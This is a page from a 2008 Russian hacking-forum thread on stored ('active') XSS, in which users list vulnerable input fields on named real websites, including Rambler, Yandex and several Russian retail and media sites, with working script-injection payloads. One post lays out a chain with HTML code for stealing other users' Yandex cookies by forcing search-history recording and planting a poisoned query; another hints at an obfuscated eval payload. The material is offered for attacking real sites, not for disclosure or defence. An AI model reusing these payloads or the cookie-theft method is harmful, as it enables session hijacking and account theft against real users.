HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 30 из 54 « Первая < 20 26 27 28 29 30 31 32 33 34 40 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #291  
Старый 21.11.2008, 20:38
dfgrd
Banned
Регистрация: 12.02.2008
Сообщений: 123
С нами: 9602246

Репутация: 172
По умолчанию
http://sacredangelro.com/svn/
в чате <script>alert(XSS)</script> в теме сообщения
 
Ответить с цитированием

  #292  
Старый 22.11.2008, 21:15
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию
Код:
liter.kz
Код:
zaycev.net
В обоих уязвимо поле поиска.
Код:
Код:
'><script>alert('xss')</script>
 
Ответить с цитированием

  #293  
Старый 22.11.2008, 21:50
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
С нами: 10692326

Репутация: 531


По умолчанию
это не активка, это пассивка, смотрим внимательно
 
Ответить с цитированием

  #294  
Старый 25.11.2008, 02:27
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию
RAMBLER.RU

http://id-planet.rambler.ru/other/education/add

Добавляем учебное заведение, уязвимы поля "Название:" и "Факультет / Специализация:"
 
Ответить с цитированием

  #295  
Старый 25.11.2008, 02:48
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
http://www.ecco-shoes.ru/rsm/gallery/

там слева поля для поиска - 5 штук.

Имя
Фамилия
Электронная почта

Город
Ключевое слово


Во всех XSS))))))))

"><script>alert('ГОЛО_СУЕМ')</script>
Последний раз редактировалось Pashkela; 25.11.2008 в 02:51..
 
Ответить с цитированием

  #296  
Старый 25.11.2008, 17:08
Luccifer
Познающий
Регистрация: 05.12.2006
Сообщений: 63
С нами: 10227528

Репутация: 100
По умолчанию
yandex.ru

http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yan dex.ru%2Fyandsearch%3Fp%3D20%26text%3Dwhack%26rpt% 3D%2522%253E%253Cscript%253Ealert(document.cookie) %253C%2Fscript%253E%26login
 
Ответить с цитированием

  #297  
Старый 25.11.2008, 20:40
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
С нами: 9731846

Репутация: 622
По умолчанию
Цитата:
Сообщение от Luccifer  
yandex.ru

http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yan dex.ru%2Fyandsearch%3Fp%3D20%26text%3Dwhack%26rpt% 3D%2522%253E%253Cscript%253Ealert(document.cookie) %253C%2Fscript%253E%26login
не работает

оперативно залатали
Последний раз редактировалось chekist; 27.11.2008 в 10:29..
 
Ответить с цитированием

  #298  
Старый 11.12.2008, 20:39
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию
Яндекс.

На Яндексе есть такой сервис- "Мои находки" (nahodki.yandex.ru). Если запись истории включена, то на странице http://nahodki.yandex.ru/results.xml мы можем наблюдать свои поисковые запросы, и эти строки не фильтруются.
Что нам нужно сделать, чтобы поиметь чужие куки:
  • "Насильно" включить юзеру запись истории
  • Послать яндексу ядовитый поисковый запрос
  • Направить юзера на зараженную страницу истории запросов
Для этого будем направлять жертву на специальную страницу(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).
Кодес:
Код:
<html>
<body onload="location.href='http://nahodki.yandex.ru/';">
<img src="http://nahodki.yandex.ru/save_tunes.xml?store=1">
<img src="http://yandex.ru/yandsearch?clid=14585&text=тут_наш_злобнокодес">
</body>
</html>
 
Ответить с цитированием

  #299  
Старый 11.12.2008, 22:22
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
Цитата:
(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).

Код:
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<title>Миракаль</title> 
</head> 
<frameset rows="30,30,30" cols="*"> 
<frame src="http://rambler.ru" name="rambler" scrolling="no" noresize> 
<frame src="http://yandex.ru" name="yandex" scrolling="no" noresize> 
<frame src="http://google.ru" name="google" scrolling="no" noresize> 
</frameset> 
</html>
Последний раз редактировалось Pashkela; 11.12.2008 в 22:29..
 
Ответить с цитированием

  #300  
Старый 15.12.2008, 20:27
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию
otake.ru

В "псто" вставляем какбэ картинку:
Код:
javascript:eval(String.fromCharCode.....)
только для риальне воене!!!1
 
Ответить с цитированием
Ответ
Страница 30 из 54 « Первая < 20 26 27 28 29 30 31 32 33 34 40 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.